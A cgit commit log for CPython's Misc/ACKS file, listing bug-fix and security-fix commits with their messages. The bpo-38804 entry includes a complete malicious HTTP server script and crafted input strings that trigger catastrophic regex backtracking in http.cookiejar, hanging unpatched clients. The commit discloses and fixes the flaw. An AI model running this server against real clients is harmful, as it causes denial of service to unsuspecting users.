summaryrefslogtreecommitdiffstats
path: root/Misc/ACKS
Commit message (Collapse)AuthorAgeFilesLines
* bpo-38804: Fix REDoS in http.cookiejar (GH-17157) (GH-17345)Victor Stinner2019-11-241-0/+1
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular expression denial of service (REDoS). LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar to parse Set-Cookie headers returned by a server. Processing a response from a malicious HTTP server can lead to extreme CPU usage and execution will be blocked for a long time. The regex contained multiple overlapping \s* capture groups. Ignoring the ?-optional capture groups the regex could be simplified to \d+-\w+-\d+(\s*\s*\s*)$ Therefore, a long sequence of spaces can trigger bad performance. Matching a malicious string such as LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!") caused catastrophic backtracking. The fix removes ambiguity about which \s* should match a particular space. You can create a malicious server which responds with Set-Cookie headers to attack all python programs which access it e.g. from http.server import BaseHTTPRequestHandler, HTTPServer def make_set_cookie_value(n_spaces): spaces = " " * n_spaces expiry = f"1-c-1{spaces}!" return f"b;Expires={expiry}" class Handler(BaseHTTPRequestHandler): def do_GET(self): self.log_request(204) self.send_response_only(204) # Don't bother sending Server and Date n_spaces = ( int(self.path[1:]) # Can GET e.g. /100 to test shorter sequences if len(self.path) > 1 else 65506 # Max header line length 65536 ) value = make_set_cookie_value(n_spaces) for i in range(99): # Not necessary, but we can have up to 100 header lines self.send_header("Set-Cookie", value) self.end_headers() if __name__ == "__main__": HTTPServer(("", 44020), Handler).serve_forever() This server returns 99 Set-Cookie headers. Each has 65506 spaces. Extracting the cookies will pretty much never complete. Vulnerable client using the example at the bottom of https://docs.python.org/3/library/http.cookiejar.html : import http.cookiejar, urllib.request cj = http.cookiejar.CookieJar() opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj)) r = opener.open("http://localhost:44020/") The popular requests library was also vulnerable without any additional options (as it uses http.cookiejar by default): import requests requests.get("http://localhost:44020/") * Regression test for http.cookiejar REDoS If we regress, this test will take a very long time. * Improve performance of http.cookiejar.ISO_DATE_RE A string like "444444" + (" " * 2000) + "A" could cause poor performance due to the 2 overlapping \s* groups, although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was. (cherry picked from commit 1b779bfb8593739b11cbb988ef82a883ec9d077e)
* bpo-36713: Rename duplicated method in test_unicode. (#13525)Michele Angrisano2019-05-231-0/+1
| | | | | modified: Lib/ctypes/test/test_unicode.py modified: Misc/ACKS new file: Misc/NEWS.d/next/Library/2019-05-23-15-57-36.bpo-36713.sjPhnf.rst
* [2.7] bpo-34472: Add data descriptor signature to zipfile (GH-8871) (ПР-9407)Serhiy Storchaka2018-09-221-0/+1
| | | | | | | This makes streamed zips compatible with MacOS Archive Utility and other applications. (cherry picked from commit 4ba3b50bfe6d50cd82d208023ea23e203ab50589) Co-authored-by: Silas Sewell <silas@sewell.org>
* [2.7] closes bpo-34050: Fix link in SSL docs (GH-8173). (GH-8179)Benjamin Peterson2018-07-071-0/+1
| | | | | (cherry picked from commit 9c5ba097485c8c643b670acd4026f4382bc92f4b) Co-authored-by: Marcin Niemira <marcin@niemira.net>
* bpo-29456: Fix bugs in unicodedata.normalize: u1176, u11a7 and u11c3 ↵Xiang Zhang2018-06-151-0/+1
| | | | | | | | | | (GH-1958) (GH-7704) Hangul composition check boundaries are wrong for the second character ([0x1161, 0x1176) instead of [0x1161, 0x1176]) and third character ((0x11A7, 0x11C3) instead of [0x11A7, 0x11C3]).. (cherry picked from commit d134809cd3764c6a634eab7bb8995e3e2eff14d5) Co-authored-by: Wonsup Yoon <pusnow@me.com>
* [2.7] bpo-33542: Ignore DUID in uuid.get_node on Windows. (GH-6922) (GH-7015)Serhiy Storchaka2018-05-201-0/+1
| | | | | | | | | uuid._ipconfig_getnode did not validate the maximum length of the value, so long as the value had the same type of formatting as a MAC address. This let it select DUIDs as MAC addresses. It now requires an exact length match.. (cherry picked from commit c66c342cb42ab8a88884527ddfe3a5086bc06316) Co-authored-by: CtrlZvi <viz+github@flippedperspective.com>
* [2.7] bpo-32861: robotparser fix incomplete __str__ methods. (GH-5711) ↵Serhiy Storchaka2018-05-141-0/+1
| | | | | | | | | (GH-6795) (GH-6817) The robotparser's __str__ representation now includes wildcard entries. (cherry picked from commit c3fa1f2b93fa4bf96a8aadc74ee196384cefa31e) Co-authored-by: Michael Lazar <lazar.michael22@gmail.com>.
* bpo-33038: Fix gzip.GzipFile for file objects with a non-string name ↵Bo Bayles2018-05-091-0/+1
| | | | attribute. (GH-6095)
* [2.7] bpo-33256: Replace angle brackets around python object repr to display ↵Serhiy Storchaka2018-04-301-0/+1
| | | | | | | it in html (GH-6442). (GH-6650) (cherry picked from commit 7d68bfa82654ba01d860b8a772ff63bf0bd183ee) Co-authored-by: sblondon <sblondon@users.noreply.github.com>
* [2.7] bpo-31920: Fixed handling directories as arguments in the ↵Serhiy Storchaka2018-04-101-0/+1
| | | | | | | ``pygettext`` script. (GH-6259) (GH-6436) Based on patch by Oleg Krasnikov. (cherry picked from commit c93938b5beea4c3f592119ebee6d4029558db8de)
* [2.7] bpo-32981: Fix catastrophic backtracking vulns (GH-5955)Benjamin Peterson2018-03-041-0/+2
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | * Prevent low-grade poplib REDOS (CVE-2018-1060) The regex to test a mail server's timestamp is susceptible to catastrophic backtracking on long evil responses from the server. Happily, the maximum length of malicious inputs is 2K thanks to a limit introduced in the fix for CVE-2013-1752. A 2KB evil response from the mail server would result in small slowdowns (milliseconds vs. microseconds) accumulated over many apop calls. This is a potential DOS vector via accumulated slowdowns. Replace it with a similar non-vulnerable regex. The new regex is RFC compliant. The old regex was non-compliant in edge cases. * Prevent difflib REDOS (CVE-2018-1061) The default regex for IS_LINE_JUNK is susceptible to catastrophic backtracking. This is a potential DOS vector. Replace it with an equivalent non-vulnerable regex. Also introduce unit and REDOS tests for difflib. Co-authored-by: Tim Peters <tim.peters@gmail.com> Co-authored-by: Christian Heimes <christian@python.org>. (cherry picked from commit 0e6c8ee2358a2e23117501826c008842acb835ac)
* [2.7] bpo-30028: make test.support.temp_cwd() fork-safe (GH-1066) (GH-5825)Anselm Kruis2018-02-231-0/+1
| | | | | | | Make test.support.temp_cwd() fork-safe. The context manager test.support.temp_cwd() no longer removes the temporary directory when executing in a process other than the parent it entered from. If a forked child exits the context manager it won't do the cleanup.. (cherry picked from commit 33dddac00ba8d9b72cf21b8698504077eb3c23ad) Co-authored-by: Anselm Kruis <a.kruis@science-computing.de>
* [2.7] bpo-31848: Fix broken error handling in Aifc_read.initfp() when the ↵Miss Islington (bot)2018-02-211-0/+1
| | | | | | | | | | | SSND chunk is not found (GH-5240) (GH-5781) Initialize self._ssnd_chunk so that aifc.Error is raised as intended, not AttributeError. (cherry picked from commit 80d20b918bd8a882043c493a7f958333ecb41727) Co-authored-by: Zackery Spytz <zspytz@gmail.com>
* [2.7] bpo-30157: Fix csv.Sniffer.sniff() regex pattern. (GH-5601) (GH-5604)Serhiy Storchaka2018-02-091-0/+1
| | | | | Co-authored-by: Jake Davis <jcdavis@awedge.net>. (cherry picked from commit 2411292ba8155327125d8a1da8a4c9fa003d5909)
* [2.7] bpo-30057: Fix potential missed signal in signal.signal(). (GH-4258) ↵Antoine Pitrou2017-11-031-0/+1
| | | | | | (#4263) Bug report and patch by Jeroen Demeyer.. (cherry picked from commit f6f90ff079a22b79a58d47b6117cc8a8c7d366f3)
* [2.7] bpo-31334: Fix timeout in select.poll.poll() (GH-3277) (#4034)Riccardo Coccioli2017-10-181-0/+1
| | | | | | | Always pass -1, or INFTIM where defined, to the poll() system call when a negative timeout is passed to the poll.poll([timeout]) method in the select module. Various OSes throw an error with arbitrary negative values.. (cherry picked from commit 6cfa927ceb931ad968b5b03e4a2bffb64a8a0604)
* bpo-25684: ttk.OptionMenu radiobuttons weren't unique (GH-2276) (GH-2960)Cheryl Sabella2017-09-101-0/+1
| | | | | ttk.OptionMenu radiobuttons weren't unique between instances of OptionMenu. (cherry picked from commit a568e5273382a5dca0c27274f7d8e34c41a87d4d)
* [2.7] bpo-31107: Fix copyreg mangled slot names calculation. (GH-2989). (#3004)Shane Harvey2017-08-051-0/+1
| | | (cherry picked from commit c4c9866064f03646c686d7e08b00aeb203c35c19)
* [2.7] bpo-30964: Mention ensurepip in package installation docs (GH-2795)Nicholas2017-07-211-0/+1
| | | | | | | | Adds a new 'Pip not installed' section that covers running `ensurepip` manually, and also references the relevant section of the Python Packaging User Guide. (cherry picked from commit b3527bfefd7a0188d43a2d7515ac6addd97a8202)
* bpo-30500: urllib: Simplify splithost by calling into urlparse. (#1849) (#2294)Victor Stinner2017-06-201-0/+1
| | | | | | | | | The current regex based splitting produces a wrong result. For example:: http://abc#@def Web browsers parse that URL as ``http://abc/#@def``, that is, the host is ``abc``, the path is ``/``, and the fragment is ``#@def``. (cherry picked from commit 90e01e50ef8a9e6c91f30d965563c378a4ad26de)
* [2.7] bpo-30657: Check & prevent integer overflow in PyString_DecodeEscape ↵Jay Bosamiya2017-06-181-0/+1
| | | | (#2174)
* [2.7] bpo-29960 _random.Random corrupted on exception in setstate(). … (#1289)Mariatta2017-05-271-0/+1
| | | (cherry picked from commit 9616a82e7802241a4b74cf7ae38d43c37bf66e48)
* bpo-30409: locale.getpreferredencoding doesn't return result (#1672)Sean McCully2017-05-211-0/+1
|
* [2.7] bpo-27945: Fixed various segfaults with dict. (GH-1657) (#1681)Serhiy Storchaka2017-05-201-0/+1
| | | | | Based on patches by Duane Griffin and Tim Mitchell. (cherry picked from commit 753bca3934a7618a4fa96e107ad1c5c18633a683)
* bpo-30357 each test in test_thread waits until all spawned threads finish ↵grzgrzgrz32017-05-151-0/+1
| | | | | | | | | | | | | | | | | | | | | | | | (#1583) * bpo-30357 each test in test_thread waits until all spawn threads finish * bpo-30357 each test in test_thread waits until all spawn threads finish * bpo-30357: test_thread now uses threading_cleanup() (#1592) test_thread: setUp() now uses support.threading_setup() and support.threading_cleanup() to wait until threads complete to avoid random side effects on following tests. Co-Authored-By: Victor Stinner <victor.stinner@gmail.com> * bpo-30357: test_thread now uses threading_cleanup() (#1592) test_thread: setUp() now uses support.threading_setup() and support.threading_cleanup() to wait until threads complete to avoid random side effects on following tests. Co-Authored-By: Victor Stinner <victor.stinner@gmail.com>
* [2.7] bpo-29243: Fix Makefile with respect to --enable-optimizations ↵torsava2017-05-091-0/+1
| | | | | | | | | | | | | | | (GH-1478) (#1522) * bpo-29243: Fix Makefile with respect to --enable-optimizations When using the Profile Guided Optimization (./configure --enable-optimizations) Python is built not only during `make` but rebuilt again during `make test`, `make install` and others. This patch fixes the issue. Note that this fix produces no change at all in the Makefile if configure is run witout --enable-optimizations. * !squash. (cherry picked from commit a1054c3b0037d4c2a5492e79fc193f36245366c7)
* bpo-29506: Clarify deep copy note in copy moduleNick Coghlan2017-04-091-0/+1
| | | | | | | | The reference to administrative data was confusing to readers, so this simplifies the note to explain that deep copying may copy more then you intended, such as data that you expected to be shared between copies. Patch by Sanyam Khurana.
* [2.7] bpo-19225: Lack of c api exceptions doc (#964)cocoatomo2017-04-081-0/+1
| | | | | | * Keep the c-api exception doc up-to-date cherry-pick'ed from ec1f5df..e3d6db3 and fix conflict
* Issue #28768: Fix implicit declaration of function _setmode. Patch by ↵Steve Dower2016-12-281-1/+2
| | | | Masayuki Yamamoto
* Issue #13051: Fixed recursion errors in large or resized curses.textpad.Textbox.Serhiy Storchaka2016-12-281-0/+1
| | | | Based on patch by Tycho Andersen.
* Issue #29078: Add the missing import in datetime.time doc example.Xiang Zhang2016-12-271-0/+1
| | | | Patch by Dhushyanth Ramasamy.
* Issue #10656: Fix out-of-tree building on AIXMartin Panter2016-11-201-0/+2
| | | | | The ld_so_aix script and python.exp file are created in the build directory. Patch by Tristan Carel and Michael Haubenwallner.
* Issue #28000: Fix gethostbyname_r() usage on AIX with _LINUX_SOURCE_COMPATMartin Panter2016-11-141-0/+1
| | | | Patch by Matthieu S.
* Issue #28616: Correct help for sys.version_info releaselevel component.Ned Deily2016-11-041-0/+1
| | | | Patch by Anish Tambe.
* Issue #28387: Fixed possible crash in _io.TextIOWrapper deallocator whenSerhiy Storchaka2016-11-031-0/+1
| | | | | the garbage collector is invoked in other thread. Based on patch by Sebastian Cufre.
* Issue #26240: Clean up the subprocess module doc stringMartin Panter2016-10-261-0/+1
| | | | Patch by Tim Mitchell.
* Issue #28435: Avoid no_proxy environment variable interfering with testsMartin Panter2016-10-221-0/+1
| | | | Patch by Piotr Szczepaniak.
* Issue #18287: PyType_Ready() now checks that tp_name is not NULL.Serhiy Storchaka2016-10-071-0/+1
| | | | Original patch by Niklas Koep.
* Issue #28815: Change '?' to '<module>' in some doc examples.Terry Jan Reedy2016-09-301-0/+1
| | | | Patch by Mariatta Wijaya.
* IDLE NEWS item and ack.Terry Jan Reedy2016-09-291-0/+1
|
* Issue #27806: add Aleks to Misc/ACKS.Ned Deily2016-09-181-0/+1
|
* Issue #27934: Use float.__repr__ instead of plain repr when JSON-encoding an ↵Mark Dickinson2016-09-031-0/+1
| | | | instance of a float subclass. Thanks Eddie James.
* # 2466: ismount now recognizes mount points user can't access.R David Murray2016-08-231-0/+1
| | | | Patch by Robin Roth, backport by Xiang Zhang.
* Prevent HTTPoxy attack (CVE-2016-1000110)Senthil Kumaran2016-07-301-0/+1
| | | | | | | Ignore the HTTP_PROXY variable when REQUEST_METHOD environment is set, which indicates that the script is in CGI mode. Issue reported and patch contributed by Rémi Rampin.
* Issue #27490: Do not build pgen when cross-compilingMartin Panter2016-07-281-0/+1
| | | | | | | | The dependendency on the $(PGEN) variable must only be set when not cross-compiling. When cross-compiling, $(PGEN) will not be used, so no need to build it. Patch by Thomas Perl.
* Issue #25393: Fix probable copy/paste error in resource docsZachary Ware2016-07-191-0/+1
| | | | Patch by Alakshendra Yadav.
* Issue #27238: Got rid of bare excepts in the turtle module. Original patchSerhiy Storchaka2016-06-141-0/+1
| | | | by Jelle Zijlstra.
* #16484: Change PYTHONDOCS to "https:", and fix links to use lowercaseMartin Panter2016-06-121-0/+1
| | | | Implementation by Sean Rodman; test by Kaushik Nadikuditi.
* Issue #25738: Don’t send message body for 205 Reset ContentMartin Panter2016-06-081-0/+1
| | | | Patch by Susumu Koshiba.
* Issue 25926: Clarify that the pure python equivalents are only approximate.Raymond Hettinger2016-05-281-0/+1
|
generated by cgit v0.12 at 2025-04-25 01:34:02 (GMT)